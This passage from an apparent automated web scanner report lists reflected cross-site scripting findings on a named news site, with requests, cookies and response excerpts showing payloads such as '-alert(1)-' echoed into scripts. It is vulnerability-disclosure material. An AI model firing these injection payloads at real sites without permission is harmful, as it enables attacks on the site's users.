GET /apple-brings-ipad-features-to-the-mac-with-lion-os-147328c0f'-alert(1)-'83bad171cd3/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40508
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ext/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-147328c0f'-alert(1)-'83bad171cd3/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.14. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac700"><a>1a2bd182e0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?ac700"><a>1a2bd182e0a=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65484
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?ac700"><a>1a2bd182e0a=1/" /> ...[SNIP]...
1.15. http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb0bd'-alert(1)-'aaf2054e1de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?cb0bd'-alert(1)-'aaf2054e1de=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65122
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... t/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/apple-brings-ipad-features-to-the-mac-with-lion-os-1473/?cb0bd'-alert(1)-'aaf2054e1de=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1707'-alert(1)-'4149b8c4453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /archivee1707'-alert(1)-'4149b8c4453/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40412
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/archivee1707'-alert(1)-'4149b8c4453/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.17. http://www.technewsdaily.com/archive/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/archive/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd4ea'-alert(1)-'75961f77880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /archive/?bd4ea'-alert(1)-'75961f77880=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43827
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/archive/?bd4ea'-alert(1)-'75961f77880=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3903'-alert(1)-'7bbd8c68678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /augmented-reality-app-translates-in-real-time-1829c3903'-alert(1)-'7bbd8c68678/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:18 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... pe="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829c3903'-alert(1)-'7bbd8c68678/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.19. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df3ed"><a>423825c8472 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /augmented-reality-app-translates-in-real-time-1829/?df3ed"><a>423825c8472=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63486
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/?df3ed"><a>423825c8472=1/" /> ...[SNIP]...
1.20. http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ddd9'-alert(1)-'8ecc608f87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /augmented-reality-app-translates-in-real-time-1829/?2ddd9'-alert(1)-'8ecc608f87=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63094
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/augmented-reality-app-translates-in-real-time-1829/?2ddd9'-alert(1)-'8ecc608f87=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6fd3'-alert(1)-'0864a4dfc17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /barnes-a-noble-announces-nook-color-tablete-reader-1522c6fd3'-alert(1)-'0864a4dfc17/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:51 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40508
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ext/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522c6fd3'-alert(1)-'0864a4dfc17/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.22. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd891'-alert(1)-'513c341eb68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /barnes-a-noble-announces-nook-color-tablete-reader-1522/?dd891'-alert(1)-'513c341eb68=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:37 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63595
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... t/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/?dd891'-alert(1)-'513c341eb68=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.23. http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5debe"><a>9bbd2793830 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /barnes-a-noble-announces-nook-color-tablete-reader-1522/?5debe"><a>9bbd2793830=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63957
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/barnes-a-noble-announces-nook-color-tablete-reader-1522/?5debe"><a>9bbd2793830=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d379'-alert(1)-'4014ba4bc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /better-bomb-suits-could-protect-responders-from-explosions--12935d379'-alert(1)-'4014ba4bc7/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40524
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... cript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--12935d379'-alert(1)-'4014ba4bc7/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.25. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a5"><a>a04acfa7675 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /better-bomb-suits-could-protect-responders-from-explosions--1293/?7f9a5"><a>a04acfa7675=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65507
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/?7f9a5"><a>a04acfa7675=1/" /> ...[SNIP]...
1.26. http://www.technewsdaily.com/better-bomb-suits-could-protect-responders-from-explosions--1293/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8690d'-alert(1)-'3572f3edfc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /better-bomb-suits-could-protect-responders-from-explosions--1293/?8690d'-alert(1)-'3572f3edfc6=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
